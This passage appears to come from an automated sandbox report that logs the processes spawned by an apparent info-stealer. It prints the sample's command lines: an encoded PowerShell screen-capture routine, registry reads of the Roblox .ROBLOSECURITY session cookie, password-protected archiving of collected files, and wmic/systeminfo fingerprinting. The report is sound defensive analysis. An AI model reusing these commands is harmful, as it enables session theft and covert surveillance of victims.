QALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:32
                                                            Start time:16:16:12
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:33
                                                            Start time:16:16:12
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:34
                                                            Start time:16:16:12
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:35
                                                            Start time:16:16:13
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff66dc00000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:36
                                                            Start time:16:16:13
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\systeminfo.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:systeminfo
                                                            Imagebase:0x7ff669fc0000
                                                            File size:110'080 bytes
                                                            MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:37
                                                            Start time:16:16:13
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:39
                                                            Start time:16:16:14
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:40
                                                            Start time:16:16:14
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:41
                                                            Start time:16:16:14
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff66dc00000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:42
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:43
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:44
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline"
                                                            Imagebase:0x7ff7438e0000
                                                            File size:2'759'232 bytes
                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:45
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:46
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:47
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\getmac.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:getmac
                                                            Imagebase:0x7ff6934e0000
                                                            File size:90'112 bytes
                                                            MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:48
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff66dc00000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:49
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA594.tmp" "c:\Users\user\AppData\Local\Temp\bohkan2x\CSC24344491B9A34B60B194FE692FA1E0E5.TMP"
                                                            Imagebase:0x7ff7fee70000
                                                            File size:52'744 bytes
                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:50
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:51
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:52
                                                            Start time:16:16:16
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff66dc00000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:53
                                                            Start time:16:16:16
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:54
                                                            Start time:16:16:16
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:55
                                                            Start time:16:16:16
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff66dc00000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:56
                                                            Start time:16:16:16
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:57
                                                            Start time:16:16:17
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:58
                                                            Start time:16:16:17
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:59
                                                            Start time:16:16:18
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:60
                                                            Start time:16:16:18
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:61
                                                            Start time:16:16:18
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:63
                                                            Start time:16:16:21
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:64
                                                            Start time:16:16:21
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:65
                                                            Start time:16:16:21
                                                            Start date:20/07/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *
                                                            Imagebase:0x7ff629af0000
                                                            File size:630'736 bytes
                                                            MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 0%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:66
                                                            Start time:16:16:23
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:67
                                                            Start time:16:16:23
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:68
                                                            Start time:16:16:23
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wmic os get Caption
                                                            Imagebase:0x7ff7db190000
                                                            File size:576'000 bytes
                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:71
                                                            Start time:16:16:24
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:72
                                                            Start time:16:16:24
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:73
                                                            Start time:16:16:24
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wmic computersystem get totalphysicalmemory
                                                            Imagebase:0x7ff7db190000
                                                            File size:576'000 bytes
                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:74
                                                            Start time:16:16:25
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:75
                                                            Start time:16:16:25
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:76
                                                            Start time:16:16:25
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wmic csproduct get uuid
                                                            Imagebase:0x7ff7db190000
                                                            File size:576'000 bytes
                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:77
                                                            Start time:16:16:26
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:78
                                                            Start time:16:16:26
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:79
                                                            Start time:16:16:26
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
